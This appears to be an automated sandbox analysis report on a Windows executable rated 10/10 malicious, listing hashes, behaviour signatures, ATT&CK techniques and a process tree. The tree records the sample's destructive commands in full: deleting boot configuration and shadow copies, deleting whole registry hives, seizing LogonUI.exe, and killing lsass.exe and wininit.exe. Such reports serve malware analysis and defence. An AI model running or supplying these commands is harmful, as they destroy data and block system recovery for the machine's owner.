Overview

overview

10

Static

static

1383b80440...13.exe

windows7_x64

1383b80440...13.exe

windows10_x64

Analysis

  • max time kernel
    15s
  • max time network
    14s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    18-04-2021 01:08

Sharing

Copy URL
Twitter E-mail

Errors

Reason
Machine shutdown
Report Analysis Logs

General

  • Target

    1383b80440ad105c0899143a80472ca844cc9c23de6d4e59777eb7f464747813.exe

  • Size

    86KB

  • MD5

    226213909fea9a07e66f734dedfb2d1d

  • SHA1

    218d7e3178a60ad08abebc68bb462773a6f80b38

  • SHA256

    1383b80440ad105c0899143a80472ca844cc9c23de6d4e59777eb7f464747813

  • SHA512

    ecb0c2a7fc5ee54168dedd4f67a626ce3fea7ec977b65bb59fed36b48f1d2c20407228ad96e14969c58976e6a98ffd33399ea6f0b15ed6ba5568ce26abbfdce3

Score
10/10
adwarediscoveryexploitpersistenceransomwarestealer

Malware Config

Signatures

  • Adds autorun key to be loaded by Explorer.exe on startup 2 TTPs
    persistence
  • Modifies system executable filetype association 2 TTPs 45 IoCs
    persistence
  • Registers COM server for autorun 1 TTPs
    persistence
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Modifies Installed Components in the registry 2 TTPs
    persistence
  • Possible privilege escalation attempt 2 IoCs
    exploit
  • Modifies file permissions 1 TTPs 2 IoCs
    discovery
  • Adds Run key to start application 2 TTPs 5 IoCs
    persistence
  • Installs/modifies Browser Helper Object 2 TTPs

    BHOs are DLL modules which act as plugins for Internet Explorer.

    stealeradware
  • Modifies boot configuration data using bcdedit 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 64 IoCs
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Kills process with taskkill 2 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 64 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\1383b80440ad105c0899143a80472ca844cc9c23de6d4e59777eb7f464747813.exe
    "C:\Users\Admin\AppData\Local\Temp\1383b80440ad105c0899143a80472ca844cc9c23de6d4e59777eb7f464747813.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:788
    • C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BB4.tmp\BB5.tmp\BB6.bat C:\Users\Admin\AppData\Local\Temp\1383b80440ad105c0899143a80472ca844cc9c23de6d4e59777eb7f464747813.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1288
      • C:\Windows\System32\bcdedit.exe
        bcdedit /delete {current}
        3⤵
        • Modifies boot configuration data using bcdedit
        PID:1960
      • C:\Windows\System32\vssadmin.exe
        vssadmin delete shadows /for=c: /all /quiet
        3⤵
        • Interacts with shadow copies
        PID:1936
      • C:\Windows\System32\takeown.exe
        takeown /f LogonUI.exe
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:1428
      • C:\Windows\System32\icacls.exe
        icacls LogonUI.exe /grant Admin:f
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:1628
      • C:\Windows\System32\reg.exe
        reg delete HKCU /f
        3⤵
        • Adds Run key to start application
        • Modifies Internet Explorer settings
        • Modifies registry class
        • Modifies registry key
        PID:1708
      • C:\Windows\System32\reg.exe
        reg delete HKU /f
        3⤵
        • Adds Run key to start application
        • Modifies data under HKEY_USERS
        PID:1016
      • C:\Windows\System32\reg.exe
        reg delete HKCC /f
        3⤵
          PID:928
        • C:\Windows\System32\reg.exe
          reg delete HKCR /f
          3⤵
          • Modifies system executable filetype association
          • Modifies registry class
          PID:428
        • C:\Windows\System32\taskkill.exe
          taskkill /im lsass.exe /f /t
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1668
        • C:\Windows\System32\reg.exe
          reg delete HKLM /f
          3⤵
          • Adds Run key to start application
          • Checks processor information in registry
          • Enumerates system info in registry
          • Modifies Internet Explorer settings
          • Modifies registry key
          PID:1704
        • C:\Windows\System32\taskkill.exe
          taskkill /im wininit.exe /f /t
          3⤵
          • Kills process with taskkill
          PID:1328
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1732
    • C:\Windows\system32\wlrmdr.exe
      -s -1 -f 2 -t You are about to be logged off -m Windows has encountered a critical problem and will restart automatically in one minute. Please save your work now. -a 3
      1⤵
        PID:1604
      • C:\Windows\system32\CompMgmtLauncher.exe
        "C:\Windows\system32\CompMgmtLauncher.exe"
        1⤵
          PID:236
        • C:\Windows\system32\CompMgmtLauncher.exe
          "C:\Windows\system32\CompMgmtLauncher.exe"
          1⤵
            PID:1720

          Network

          MITRE ATT&CK Matrix ATT&CK v6

          Initial Access

          Execution

          Persistence

          Registry Run Keys / Startup Folder

          4
          T1060

          Change Default File Association

          1
          T1042

          Browser Extensions

          1
          T1176

          Privilege Escalation

          Defense Evasion

          Modify Registry

          7
          T1112

          File Deletion

          2
          T1107

          File Permissions Modification

          1
          T1222

          Credential Access

          Discovery

          System Information Discovery

          3
          T1082

          Query Registry

          2
          T1012

          Lateral Movement

          Collection

          Exfiltration

          Command and Control

          Impact

          Inhibit System Recovery

          2
          T1490

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\BB4.tmp\BB5.tmp\BB6.bat
            MD5

            38dc7703a0a8fddc5870776a3b4e662c

            SHA1

            4fd989609b186842874ce1dba6b32ab71bc77881

            SHA256

            5636818caa00d72d10df36a8b37cd355d74855c5cf891aeaf468c19d1f08176c

            SHA512

            dd89c0adcaa1b5122eddda514d9cebe3cc100f2aed13192ba1e58ffb1848bed5c46c6b9d2762e3d1a0da01d5f099cada05a99167f675768f6573b8ef983f5291

            Download Submit
          • memory/428-69-0x0000000000000000-mapping.dmp
            Download
          • memory/788-59-0x0000000075551000-0x0000000075553000-memory.dmp
            Filesize

            8KB

            Download
          • memory/928-68-0x0000000000000000-mapping.dmp
            Download
          • memory/1016-67-0x0000000000000000-mapping.dmp
            Download
          • memory/1288-60-0x0000000000000000-mapping.dmp
            Download
          • memory/1428-64-0x0000000000000000-mapping.dmp
            Download
          • memory/1604-73-0x00000000003D0000-0x00000000003D1000-memory.dmp
            Filesize

            4KB

            Download
          • memory/1604-72-0x000007FEFBF11000-0x000007FEFBF13000-memory.dmp
            Filesize

            8KB

            Download
          • memory/1628-65-0x0000000000000000-mapping.dmp
            Download
          • memory/1668-70-0x0000000000000000-mapping.dmp
            Download
          • memory/1704-71-0x0000000000000000-mapping.dmp
            Download
          • memory/1708-66-0x0000000000000000-mapping.dmp
            Download
          • memory/1936-63-0x0000000000000000-mapping.dmp
            Download
          • memory/1960-62-0x0000000000000000-mapping.dmp
            Download